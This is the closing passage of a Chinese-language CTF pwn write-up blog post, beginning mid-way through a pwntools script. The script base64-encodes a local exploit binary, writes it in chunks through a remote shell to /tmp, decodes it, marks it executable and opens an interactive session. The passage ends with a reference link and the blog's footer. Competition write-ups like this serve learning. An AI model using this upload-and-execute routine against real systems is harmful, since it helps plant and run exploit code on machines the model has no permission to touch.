class="keyword">as</span> f:</span><br><span class="line">        data = f.read()</span><br><span class="line">    encoded = base64.b64encode(data)</span><br><span class="line">    io.recvuntil(<span class="string">&quot;# &quot;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="built_in">len</span>(encoded), <span class="number">600</span>):</span><br><span class="line">        p.status(<span class="string">&quot;%d / %d&quot;</span> % (i, <span class="built_in">len</span>(encoded)))</span><br><span class="line">        exec_cmd(<span class="string">&quot;echo \&quot;%s\&quot; &gt;&gt; /tmp/benc&quot;</span> % (encoded[i:i+<span class="number">600</span>]))</span><br><span class="line"></span><br><span class="line">    exec_cmd(<span class="string">&quot;cat /tmp/benc | base64 -d &gt; /tmp/exp&quot;</span>)</span><br><span class="line">    exec_cmd(<span class="string">&quot;chmod +x /tmp/exp&quot;</span>)</span><br><span class="line">upload(<span class="string">&#x27;exp&#x27;</span>)</span><br><span class="line">io.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202301131842540.png" alt="image-20230113184223347"></p>
<h2 id="参考文章："><a href="#参考文章：" class="headerlink" title="参考文章："></a>参考文章：</h2><p><a target="_blank" rel="noopener" href="https://xia0ji233.pro/2023/01/01/Nepnep-CatCTF2022/#injection2-0%F0%9F%92%89">攻防世界 x Nepnep x CATCTF 2022 Nepnep战队官方WP | xia0ji233’s blog</a></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%A0%88%E8%BF%81%E7%A7%BB/" rel="tag"># 栈迁移</a>
              <a href="/tags/%E6%B2%99%E7%AE%B1/" rel="tag"># 沙箱</a>
              <a href="/tags/C/" rel="tag"># C++</a>
              <a href="/tags/%E6%A0%88%E6%BA%A2%E5%87%BA/" rel="tag"># 栈溢出</a>
              <a href="/tags/%E8%BF%9B%E7%A8%8B%E6%B3%A8%E5%85%A5/" rel="tag"># 进程注入</a>
              <a href="/tags/%E4%B8%8A%E4%BC%A0%E8%84%9A%E6%9C%AC/" rel="tag"># 上传脚本</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/posts/4320fd7a.html" rel="prev" title="C++ 常见术语&&基础概念的学习总结">
                  <i class="fa fa-chevron-left"></i> C++ 常见术语&&基础概念的学习总结
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/posts/bd34f701.html" rel="next" title="check_gadget--检测one_gadget能否使用的gdb命令">
                  check_gadget--检测one_gadget能否使用的gdb命令 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">ZIKH26</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  <script src="/js/third-party/pace.js"></script>


  





</body>
</html>
